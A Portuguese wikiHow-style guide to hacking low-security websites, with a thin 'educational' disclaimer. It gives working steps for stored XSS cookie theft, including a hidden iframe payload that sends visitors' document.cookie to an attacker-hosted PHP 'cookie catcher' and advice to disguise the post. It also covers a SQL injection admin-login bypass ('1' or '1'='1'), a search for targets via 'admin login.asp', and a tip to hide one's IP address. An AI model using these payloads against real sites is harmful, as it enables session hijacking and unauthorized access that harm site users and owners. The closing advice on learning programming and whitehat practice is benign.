Baixe em PDF
Baixe em PDF
Atenção: este guia deve ser usado apenas para fins educacionais, seja para ajudar as pessoas a começar a aprender “hacks whitehat” [1] X Fonte de pesquisa ou para ver como hackers trabalham a fim de melhor proteger seus próprios sites. Este tutorial dará os passos para ter acesso a diversos sites de BAIXO NÍVEL de segurança.
Passos
-
Encontre um site vulnerável onde você possa postar conteúdo. Um fórum é um bom exemplo. Lembre-se, se o site for seguro, este método não vai funcionar [2] X Fonte de pesquisa .
-
Crie um post. Você terá que digitar um código especial para o "post" que vai capturar os dados de todos os que clicarem sobre ele.
- Você vai querer testar para ver se o sistema permite a publicação de códigos ou se os filtra. Digite <script...>alert(“teste”)</...script> (removendo o "..."). Se uma caixa de alerta aparecer quando você clica no seu post, o site está vulnerável a ataques.
-
Crie e envie o seu “cookie catcher” [3] X Fonte de pesquisa . O objetivo deste ataque é capturar os cookies de um usuário, que permite que você acesse sua conta neste site com vulnerabilidade no login. Você vai precisar de um “cookie catcher”, que irá capturar os cookies do seu alvo e redirecioná-lo. Faça o upload do “cookie catcher” em um site que tenha acesso e tenha suporte para PHP. Procurer por exemplos de “cookie catcher” na internet.
-
Faça um post com o script de seu “cookie catcher”. Introduza um código adequado que irá capturar os cookies e enviá-los para o seu site. Você deve colocar algum texto após o código para disfarçar seu post e evitar que seja deletado.
- Um código de exemplo ficaria assim <...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”YOURURL/cookiecatcher.php?c=”+document.cookie)><.../iframe>(removendo os "...").
-
Use os cookies coletados. Depois disso, você pode usar as informações dos cookies, que devem estar armazenados em seu site, para quaisquer fins que você precisar.Publicidade
-
Encontre um site vulnerável. Você terá que encontrar um site vulnerável, que tenha um login de administrador de fácil acesso. Pesquise no Google por “admin login.asp”.
-
Faça o login como administrador. Digite admin como o nome de usuário e use alguns códigos conhecidos como a senha. Os mais comuns são 1' ou '1 '= '1.
-
Paciência. Este método exige um pouco de tentativa e erro.
-
Acesse o site. Eventualmente, encontrará a sequência que permite acesso de administrador para o site (se ele for um site vulnerável a ataques).Publicidade
-
Aprenda uma ou duas linguagens de programação. Se realmente quiser aprender a hackear sites, você precisa entender como os computadores e outras tecnologias funcionam. Aprenda a usar linguagens de programação como Python ou SQL, de modo que possa controlar melhor computadores e identificar vulnerabilidades em sistemas.
-
Conheça a programação HTML. Você também precisa ter um bom conhecimento de HTML e javascript para hackear sites. Isso leva algum tempo para aprender, mas há inúmeras formas gratuitas de aprender HTML gratuitamente na internet.
-
Busque “whitehats”. “Whitehats” são hacks usados para o bem, expondo as vulnerabilidades de segurança e tornam a Internet um lugar melhor para todos. Se quiser aprender a hackear, procure sempre usar seus conhecimentos para identificar brechas em sites para repassá-las às pessoas responsáveis para que possam consertar esses erros. Converse com hackers whitehats para aprender mais sobre essa linha de trabalho.
-
Pesquise intensamente. Se estiver aprendendo a hackear ou apenas se proteger, você precisará fazer muita pesquisa. Há muitas formas diferentes de vulnerabilidades e essa lista está sempre mudando, então você terá que se atualizar constantemente.
-
Mantenha-se atualizado. Como a lista de hacks possíveis está em mudança constante, você precisa se manter atualizado constantemente. Só porque você está protegido para um determinado hack hoje, não significa que você estará seguro no futuro!Publicidade
Dicas
- Visite os fóruns de hackers para aprender inúmeras dicas úteis.
Publicidade
Avisos
- Hackear é ilegal. Se você for pego, a culpa é sua.
- Se você estiver tentando hackear no mundo real, esconda seu endereço IP usando um sofware que criptografe sua conexão.
- Se você ler este artigo, não se tornará imediatamente um hacker. Você deve explorar suas habilidades e praticar muito.
Publicidade
Referências
Publicidade